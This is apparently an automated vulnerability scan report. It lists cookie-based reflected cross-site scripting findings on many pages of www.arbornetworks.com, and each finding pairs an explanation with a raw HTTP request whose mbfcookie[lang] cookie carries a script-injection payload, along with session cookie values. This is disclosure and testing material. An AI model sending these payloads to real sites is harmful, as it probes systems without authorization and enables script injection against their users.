Cookie: mbfcookie[lang]=en68ce7"><script>alert(1)</script>36f0a831d17; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba46"><script>alert(1)</script>e9a751b4cd1 was submitted in the mbfcookie[lang] cookie. This input was echoed as fba46\"><script>alert(1)</script>e9a751b4cd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enfba46"><script>alert(1)</script>e9a751b4cd1; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b951"><script>alert(1)</script>d5453ad5523 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6b951\"><script>alert(1)</script>d5453ad5523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6b951"><script>alert(1)</script>d5453ad5523; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e4"><script>alert(1)</script>5e86c72a29f was submitted in the mbfcookie[lang] cookie. This input was echoed as a99e4\"><script>alert(1)</script>5e86c72a29f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena99e4"><script>alert(1)</script>5e86c72a29f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceac"><script>alert(1)</script>63f3f812b9a was submitted in the mbfcookie[lang] cookie. This input was echoed as 9ceac\"><script>alert(1)</script>63f3f812b9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en9ceac"><script>alert(1)</script>63f3f812b9a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb73d"><script>alert(1)</script>c71247202a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as bb73d\"><script>alert(1)</script>c71247202a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbb73d"><script>alert(1)</script>c71247202a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b712"><script>alert(1)</script>d3b5d470576 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1b712\"><script>alert(1)</script>d3b5d470576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1b712"><script>alert(1)</script>d3b5d470576; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1e4"><script>alert(1)</script>7b05d39a8bb was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c1e4\"><script>alert(1)</script>7b05d39a8bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solution-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c1e4"><script>alert(1)</script>7b05d39a8bb; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5446"><script>alert(1)</script>29761611793 was submitted in the mbfcookie[lang] cookie. This input was echoed as f5446\"><script>alert(1)</script>29761611793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-places-in-your-network.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf5446"><script>alert(1)</script>29761611793; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ac0"><script>alert(1)</script>6ebae96397e was submitted in the mbfcookie[lang] cookie. This input was echoed as 64ac0\"><script>alert(1)</script>6ebae96397e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-your-business-needs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en64ac0"><script>alert(1)</script>6ebae96397e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53001"><script>alert(1)</script>055958a227a was submitted in the mbfcookie[lang] cookie. This input was echoed as 53001\"><script>alert(1)</script>055958a227a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/technology-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en53001"><script>alert(1)</script>055958a227a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710ca"><script>alert(1)</script>808460338d8 was submitted in the mbfcookie[lang] cookie. This input was echoed as 710ca\"><script>alert(1)</script>808460338d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en710ca"><script>alert(1)</script>808460338d8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28af"><script>alert(1)</script>be53bf7bfc was submitted in the mbfcookie[lang] cookie. This input was echoed as f28af\"><script>alert(1)</script>be53bf7bfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf28af"><script>alert(1)</script>be53bf7bfc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7374"><script>alert(1)</script>b64724bdb0 was submitted in the mbfcookie[lang] cookie. This input was echoed as e7374\"><script>alert(1)</script>b64724bdb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene7374"><script>alert(1)</script>b64724bdb0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33d8"><script>alert(1)</script>9427a0c6b34 was submitted in the mbfcookie[lang] cookie. This input was echoed as e33d8\"><script>alert(1)</script>9427a0c6b34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene33d8"><script>alert(1)</script>9427a0c6b34; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7922b"><script>alert(1)</script>692436b615a was submitted in the mbfcookie[lang] cookie. This input was echoed as 7922b\"><script>alert(1)</script>692436b615a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en7922b"><script>alert(1)</script>692436b615a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48fef"><script>alert(1)</script>d8a50681f6d was submitted in the mbfcookie[lang] cookie. This input was echoed as 48fef\"><script>alert(1)</script>d8a50681f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en48fef"><script>alert(1)</script>d8a50681f6d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c78"><script>alert(1)</script>04e4fe7d485 was submitted in the mbfcookie[lang] cookie. This input was echoed as 51c78\"><script>alert(1)</script>04e4fe7d485 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en51c78"><script>alert(1)</script>04e4fe7d485; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6b5"><script>alert(1)</script>22edd466f97 was submitted in the mbfcookie[lang] cookie. This input was echoed as bd6b5\"><script>alert(1)</script>22edd466f97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbd6b5"><script>alert(1)</script>22edd466f97; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b884f"><script>alert(1)</script>27d3dcaf1dc was submitted in the mbfcookie[lang] cookie. This input was echoed as b884f\"><script>alert(1)</script>27d3dcaf1dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enb884f"><script>alert(1)</script>27d3dcaf1dc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8184b"><script>alert(1)</script>1699682b65d was submitted in the mbfcookie[lang] cookie. This input was echoed as 8184b\"><script>alert(1)</script>1699682b65d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jp/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8184b"><script>alert(1)</script>1699682b65d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5f"><script>alert(1)</script>be89fa02b90 was submitted in the mbfcookie[lang] cookie. This input was echoed as e4a5f\"><script>alert(1)</script>be89fa02b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jp/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene4a5f"><script>alert(1)</script>be89fa02b90; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6f9"><script>alert(1)</script>0bc779789b was submitted in the mbfcookie[lang] cookie. This input was echoed as ad6f9\"><script>alert(1)</script>0bc779789b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /kr/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enad6f9"><script>alert(1)</script>0bc779789b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2d6"><script>alert(1)</script>e91882c8043 was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e2d6\"><script>alert(1)</script>e91882c8043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
